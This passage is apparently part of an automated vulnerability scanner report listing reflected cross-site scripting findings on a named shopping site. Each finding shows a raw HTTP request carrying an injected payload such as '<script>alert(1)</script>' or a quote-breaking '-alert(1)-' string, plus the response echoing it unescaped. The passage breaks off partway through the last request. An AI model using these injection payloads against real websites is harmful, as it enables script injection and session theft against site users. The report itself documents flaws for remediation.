This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Moviesce2d2<script>alert(1)</script>8528b945f37/05084418/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:04:40 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56529

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Moviesce2d2<script>alert(1)</script>8528b945f37 <a href="#" id="backlink">
...[SNIP]...

4.739. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11cb5'-alert(1)-'91c08c29f3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/0508441811cb5'-alert(1)-'91c08c29f3/Movie-Rentals/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:15:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Books-Music-Movies/0508441811cb5'-alert(1)-'91c08c29f3/Movie-Rentals/3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.740. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 972fb'-alert(1)-'d8b8b2132af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418/Movie-Rentals972fb'-alert(1)-'d8b8b2132af/3 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:24:26 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56513

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/05084418/Movie-Rentals972fb'-alert(1)-'d8b8b2132af/3';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.741. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movie-Rentals/3

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload be3db'-alert(1)-'f4e0b9aa4be was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418/Movie-Rentals/3be3db'-alert(1)-'f4e0b9aa4be HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:31:28 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/05084418/Movie-Rentals/3be3db'-alert(1)-'f4e0b9aa4be';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.742. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78963"><a>be44763c853 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping78963"><a>be44763c853/Books-Music-Movies/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:43:24 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping78963"><a>be44763c853">
...[SNIP]...

4.743. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e62b5'-alert(1)-'b2f09b3cf7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinge62b5'-alert(1)-'b2f09b3cf7e/Books-Music-Movies/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:50:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59913

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shoppinge62b5'-alert(1)-'b2f09b3cf7e/Books-Music-Movies/05084418/Movies-Games/6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.744. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2ce15<script>alert(1)</script>504dd757676 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Movies2ce15<script>alert(1)</script>504dd757676/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:55:00 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56153

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Books Music Movies2ce15<script>alert(1)</script>504dd757676 <a href="#" id="backlink">
...[SNIP]...

4.745. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 875f4'-alert(1)-'4f3c3afd9bd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies875f4'-alert(1)-'4f3c3afd9bd/05084418/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:54:17 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Books-Music-Movies875f4'-alert(1)-'4f3c3afd9bd/05084418/Movies-Games/6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.746. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2bbac'-alert(1)-'087a074d55 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/050844182bbac'-alert(1)-'087a074d55/Movies-Games/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:58:44 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56738

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Books-Music-Movies/050844182bbac'-alert(1)-'087a074d55/Movies-Games/6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.747. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3115'-alert(1)-'ff000cff8aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418/Movies-Gamesb3115'-alert(1)-'ff000cff8aa/6 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:05:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56149

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Books-Music-Movies/05084418/Movies-Gamesb3115'-alert(1)-'ff000cff8aa/6';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.748. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Movies-Games/6 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Movies-Games/6

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc1f8'-alert(1)-'fe0b72b0da was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Books-Music-Movies/05084418/Movies-Games/6cc1f8'-alert(1)-'fe0b72b0da HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:12:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54240

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Books-Music-Movies/05084418/Movies-Games/6cc1f8'-alert(1)-'fe0b72b0da';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.749. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39914"><a>3128a551cea was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping39914"><a>3128a551cea/Books-Music-Movies/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:50:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping39914"><a>3128a551cea">
...[SNIP]...

4.750. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ef96'-alert(1)-'d866e2dc6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping2ef96'-alert(1)-'d866e2dc6c/Books-Music-Movies/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:01:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping2ef96'-alert(1)-'d866e2dc6c/Books-Music-Movies/05084418/Music/72';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.751. http://www.beirut.com/Shopping/Books-Music-Movies/05084418/Music/72 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Books-Music-Movies/05084418/Music/72

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e180d<script>alert(1)</script>e757b572d02 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Books-Music-Moviese180d<script>alert(1)</script>e757b572d02/05084418/Music/72 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
